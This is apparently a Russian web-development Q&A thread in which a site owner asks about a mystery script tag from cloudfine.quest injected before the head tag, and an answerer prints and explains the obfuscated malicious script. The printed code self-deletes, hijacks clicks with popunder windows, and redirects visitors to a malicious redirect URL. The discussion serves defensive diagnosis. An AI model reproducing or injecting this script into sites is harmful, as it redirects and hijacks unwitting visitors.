@lolrofl01

Кто-нибудь сталкивался с подключением скрипта с домена cloudfine.quest?

Добрый день.
На одном из сайтов столкнулся с такой проблемой. Перед закрывающим тегом head вставляется подключение скрипта:
<script type='text/javascript' async src='https://7bt9di0o.cloudfine.quest/challenge.js'></script>

Этот домен вообще относится как-то к cloudflare?

Проблема в том, что сайт - простенький самопис из нескольких страниц. Т.е. это не движок с кучей плагинов. И никакой cloudflare установлен не был. На хостинге тоже отрицают причастность к cloudflare и к данному скрипту. Попробовал скопировать сайт и разместить его у себя на локалке - эффект тот же. Скрипт также подключается, виден во всех браузерах.

Прошерстил все файлы проекта - не нашел никаких подключений. Ни по одному из ключевых слов не находится ничего подобного. Антивирус айболит говорит вирусов нет. Кто-нибудь с таким сталкивался? Где можно поискать? Отключил вообще все скрипты с сайта думая, что может шифрованную строку куда-то внедрили и при загрузке документа скрипт внедряет подключение другого скрипта - нет. Даже с отключенным javascript в браузере и с полностью удаленными скриптами из проекта - подключение все равно добавляется.
  • Вопрос задан
  • 93 просмотра
Решения вопроса 1
Mike_Ro
@Mike_Ro Куратор тега JavaScript
Python, JS, WordPress, SEO, Bots, Adversting
Код скрипта
document.currentScript.remove();if(typeof wsjwa573==='undefined'){const wsjwa573=true;const wkonuolh='https://cloudfine.quest/redirect';if(('PushManager'in window)&&('Notification'in window)&&('fetch'in window)){window.location.replace('https://'+(window.location.hostname!==undefined?wi...);}else{const is5ykqkx=setInterval(()=>{if(document.readyState==='interactive'||document.readyState==='complete'){clearInterval(is5ykqkx);if('ontouchstart'in window){function vg4ymqkq(afzqftyr){document.removeEventListener('click',vg4ymqkq);if(window.open(afzqftyr.target.href===undefined?window.location.href:afzqftyr.target.href,'_blank')!==null){afzqftyr.preventDefault();afzqftyr.stopPropagation();setTimeout(()=>{window.location.href=wkonuolh;},1000);}}document.addEventListener('click',vg4ymqkq);}else{function vg4ymqkq(afzqftyr){afzqftyr.preventDefault();afzqftyr.stopPropagation();document.removeEventListener('click',vg4ymqkq);const ga3m40pt=window.open('','_blank','fullscreen=no,height=100,left='+(screen.width+100)+',location=no,menubar=no,resizable=no,scrollbars=no,status=no,titlebar=no,toolbar=no,top='+(screen.height+100)+',width=100');if(ga3m40pt!==null){function nxq27s6i(){clearTimeout(ryzfrfy5);ga3m40pt.moveTo(0,0);ga3m40pt.resizeTo(window.screen.availWidth,window.screen.availHeight);ga3m40pt.document.location.href=wkonuolh;window.removeEventListener('focus',nxq27s6i);}const ryzfrfy5=setTimeout(()=>{ga3m40pt.close();window.removeEventListener('focus',nxq27s6i);},8000);ga3m40pt.moveTo(screen.width+100,screen.height+100);window.addEventListener('focus',nxq27s6i);}document.body.style.opacity='1';}document.body.style.opacity='0.7';document.addEventListener('click',vg4ymqkq);}}},50);}}

Вредонос:
1. Выполняет все операции и сразу удаляется из dom.
2. Чекает переменную wsjwa573 (на нее много чего завязано, хз зачем, нет времени вычислять).
3. Проверяет, если ли в браузере посетителя pushmanager, notification и fetch apis.
4. Редиректит на вредоносный сайт по условию.
5. Ставит обработчик ontouchstart по клику и условию.
Итп.
Прошерстил все файлы проекта - не нашел никаких подключений. Ни по одному из ключевых слов не находится ничего подобного.

Разумеется не нашли, вредонос создавался не для того, чтобы его было просто найти. Ищите дальше, кто то его в любом случае подключает на страницу.
Ответ написан
Пригласить эксперта
Ответы на вопрос 1
dima9595
@dima9595
Junior PHP
lolrofl01,
html разметку или в php файл какой

Да где угодно. Может вообще в изображение пихнули (хотя я не разбираюсь особо в таком).

Меня вообще удивляет, что вы как-то ловите такие вирусы. Когда проект самопис, ну или по крайней мере используется что-то популярное (фреймворки или cms), то такого вообще не наблюдается. А вот если брать что-то крякнутое, то вполне может быть.

В любом случае начните с HTML, потом перейдите к js файлам. Возможно из js как-то вызывается. Потом уже к php.
И по файлам: нужно смотреть не на наличии подозрительных файлов, а изменении кода. Т.е. могут в зашифрованном виде что-то написано или просто напрямую вызывать то, что не должно быть там.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы